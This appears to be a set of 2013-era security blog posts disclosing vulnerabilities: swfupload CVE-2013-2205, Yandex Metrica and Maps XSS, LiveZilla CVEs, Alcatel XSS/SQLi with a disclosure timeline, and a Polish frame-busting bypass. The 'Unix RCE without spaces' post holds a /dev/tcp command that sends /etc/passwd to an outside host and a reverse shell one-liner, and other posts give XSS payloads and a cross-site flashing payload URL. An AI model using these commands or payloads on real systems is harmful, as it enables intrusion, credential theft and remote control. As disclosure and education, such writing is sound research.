Analysis of swfupload CVE-2013-2205 Security.allowDomain('*') flaw

Intro

Yes - I know it's the old one. As far as I've got lots of stuff to do, I had small amount of time to take a closer look to this vulnerability, found by Szymon Gruszecki and identified by CVE-2013-2205. But I also wanted to understand how to exploit this kind of issues. As far as I couldn't find any usefull PoCs or examples on the Internet - I decided to learn it and make a post. I belive it will be usefull for someone. :)

At first, please take a look to secure swfupload fix for this vuln. Yes - it's just one removed line. :)

Security.allowDomain('*')

It will be short - for details please visit Adobe documentation. Security.allowDomain() is function, which allows flash movie to be embeded and interacted from other domain. For example, we have resource-a.com where swf-a.swf is stored (with Security.allowDomain('resource-b.com')) - we are able to embed swf-a.swf on resource-b.com and interact with all functions that are added through ExternalInterface.addCallback() method.

Depends on context of application, it can be used for example to bypass Same-Policy Origin. How? If our swf-a.swf can make some http requests to hosted resource and get the response that can be passed somehow to our javascript code... you know what's next ;-)

Analysis

Most interesting functions that we should take a look are StartUpload(), ReturnUploadStart(), HTTPError_Handler(), UploadSuccess():

UploadSuccess() is called after successful upload (wow). As we can see, it calls UploadSuccess callback (that can be defined to our own javascript function) with serverData as one of parameters - serverData is content response from requested uploadURL.

The attack

Ok - so if we are able to get content of other resource (SOP bypass), we are able to steal csrf tokens from forms. The attack scenario is simple - zoczus.mooo.com is hosting swfupload from wordpress 3.5.1 on lab.ropchain.org. After victim (logged into wp-admin panel) upload any file, we'll make request to user-new.php, parse response for nonce value, and make standard csrf attack to add other admin account. No other interaction (than file upload) is needed.

I created this proof of concept. Remember to modify wordpress-url to valid Wordpress resource.

Exploit in action:

Yandex Metrica multiple XSS vulnerabilities

Ok, some time ago I found few XSS vulnerabilities at one of Yandex services called Metrika.. Most are fixed now, so I can provide Proof Of Concepts publicly. :)

1) Reflected XSS - [somewhere]

(this one is still not fixed so - it will be disclosed in future, but it's nothing special really)

2) Stored XSS - external links

Demonstration video is quite long because I was creating PoC while recording. ;-)

http://www.youtube.com/watch?v=ZhNn0uYXpL8

3) Stored XSS - WebVisior

Visiting your website with Metrica counter in this way:

http://hostname/x.htm?<img/src="XXX"/onerror="alert(1)">ab

causes that Metrica WebVisior rendered it without escaping, which is just another stored XSS.

4) Stored XSS - file downloads

http://www.youtube.com/watch?v=4xgcjisyzK8

5) Stored XSS - Clickpath analysis

http://www.youtube.com/watch?v=SqTSoCd86Sk

6) Reflected XSS - Form Data analysis

http://www.youtube.com/watch?v=LALvffnT-vQ

7) *BONUS* out of scope (so unrewarded) reflected XSS in yandex.st.

http://yandex.st/mail/neo2/7.35.2005/static/swf/web-socket.swf?onLoad=this.alert('XSS')

Effect + source code:

And that's all for today. :)

[EN] LiveZilla multiple vulnerabilities

I was looking a bit into LiveZilla source code and found few vulnerabilities. Most of them fixed in 5.1.2.1 released few days ago. Details:


CVE-2013-7034 - LiveZilla 5.1.2.0 PHP Object Injection
CVE-2013-7033 - LiveZilla 5.1.2.0 Insecure password storage
CVE-2013-7032 - LiveZilla 5.1.2.0 Multiple Stored XSS in webbased operator client
CVE-2013-7003 - LiveZilla 5.1.1.0 Stored XSS in operator clients
CVE-2013-7002 - LiveZilla 5.1.0.0 Reflected XSS in translations

[EN] Unix RCE without spaces

You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output.

Here we go:

zoczus@hell:~$ cat</etc/debian_version 
7.1

:) Can't see the output? Send it through Internet!

[host1]

zoczus@hell:~$ cat</etc/passwd>/dev/tcp/xxxx.pl/5060

[host2]

zoczus@jano:~$ nc -l -p 5060
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
(...)

It looks all right ;) You can also create reverse shell:

sh</dev/tcp/xxxx.pl/5060>/dev/tcp/xxxx.pl/2222

So now the /bin/sh input (commands) will be taken from xxxx.pl:5060 and result - sent to xxxx.pl:2222

I hope this one was useful ;)

[EN] Alcatel OneTouch Website - XSS & SQL Injection

SO - first thing is, that both bugs are really obvious...I can't belive they exist so long in official Alcatel One Touch website.

How to reproduce bug:
1) Go to http://alcatelonetouch.com website
2)  Search for bad'syntax or f<script>alert(1);</script>
3) Get alert or PHP Error (in case you're trying to exploit XSS or SQLi).

XSS:

SQLi:

I think this case is so basic, that it don't need to be explained.

Ok - now the funny part - timeline.

05/02/2013 - discovered the bug
06/02/2013 - contact using e-mail provided in WHOIS database
13/02/2013 - no response, contacted USSupport@tcl.com
11/03/2013 - mailed to Polish Alcatel-Lucent department with request of some contact info for my case
11/03/2013 - response from Alcatel-Lucent - forward me to TCL Communication
12/03/2013 - mail sent using official TCL contact form
13/03/2013 - after googlin' - found some employee working for TCL and contact info - sent mail.
29/04/2013 - no response - tried to contact using info.america@tcl.com
12/06/2013 - still no response, tried to contact with some sales managers, found on Alcatel website
28/06/2013 - Twitted @ALCATELONETOUCH about vuln and requested for contact informations
02/07/2013 - no response - another tweet.
04/07/2013 - stil no response - another tweet
08/07/2013 - ...and another ;)
09/07/2013 - everybody please, sit down - I've got first Alcatel response. It tells that I should contact using their Official Facebook.
09/07/2013 - Contacted using facebook.
10/07/2013 - Response that confirms, that informations about fact, that I found some issue in their website was sent to their "team".
10/07/2013 - Problem was, that I didn't provided any details about vulnerability, even what kind of issue it is ;) I asked if they need any details.
11/07/2013 - I sent really detailed advisory about vulnerability I found.
16/07/2013 - got response with confirmation of sharing my details with their tech team.
24/07/2013 - tried to get some other info - no response
07/08/2013 - ping -> no response.
27/09/2013 - not fixed -> Public Disclosure

Feel free to comment. :)

-- UPDATE --
At 12/11/2013 one of TCL IT Managers responsible for AlcatelOneTouch.com website contacted with me. We cooperated to fix this issues and from now on it's ok. :)

Yandex Bug Bounty - Multiple Vulnerabilities

Few weeks ago I reported few bugs as part of Yandex Bug Bounty Program. Check it out:

1) Cross-Site Flashing  - wordstat.yandex.com

Bug in ammap.swf, that allows us to use configuration files from external resources, modify Flash content and of course - abuse it. :)

This resource is removed at the moment, but here you have payload URL I used:

http://wordstat.yandex.com/flash/ammap/ammap.swf?settings_file=http://myhost/yandex.xml&data_file=http://myhost/evil_data.xml

Configuration files: yandex.xml oraz evil_data.xml

First - check the context menu and new option - 'Download users database from this region' ;)

After clicking - our "database" is prepared to download - information in bottom of site.

When progress is 100% - our payload is executed.

2) Stored XSS - Yandex Maps

I provided short PoC video:

3) Mixed-content - Yandex Video

This one wasn't rewarded and in fact - all modern browsers blocks mixed-content at the moment (also Firefox). Demonstration video just for education purposes and fun ;-)

Winiary Pomysł Na... - ominięcie Frame-Busting

Na pewno mieliście okazję spotkać się ze zjawiskiem takim jak Clickjacking. Obecnie chyba jedyną skuteczną metodą na zabezpieczenie przed tego typu atakami jest wysłanie nagłówka X-Frame-Options, dzięki któremu mamy możliwość kontrolować czy strona ma być załadowana w ramce czy nie. Innym spotykanym zabezpieczeniem jest tzw. Frame Busting. Podczas próby załadowania strony z takim zabezpieczeniem w ramce, następuje stosowna walidacja i przekierowanie strony nadrzędnej na tą, która próbuje być załadowana.

W tym poście przedstawię chyba mało odkrywczy, ale działający pomysł na ominięcie Frame Buster'a. Testowane na przeglądarce Google Chrome 28.0.1500.5-dev działającej pod Slackware Linux 14.0. Jako przykład posłuży strona popularnej stacji radiowej, która:

1. Nie stosuje X-Frame-Options
2. Używa Frame Bustingu:

if (window.parent.frames.length != 0) {
   window.parent.location = window.location;
  }

Z pomocą przyjdzie nam atrybut sandbox. Tutaj przykładowy fragment kodu, pozwalający na załadowanie strony http://eska.pl w ramce:

<iframe sandbox="allow-scripts allow-same-origin allow-forms" src="http://eska.pl" width="800">

Opcja, którą pominęliśmy allow-top-navigation. Dodana w atrybucie sandbox pozwoli na przekierowanie (czego nie chcemy). Jak widać - udało nam się osiągnąć cel: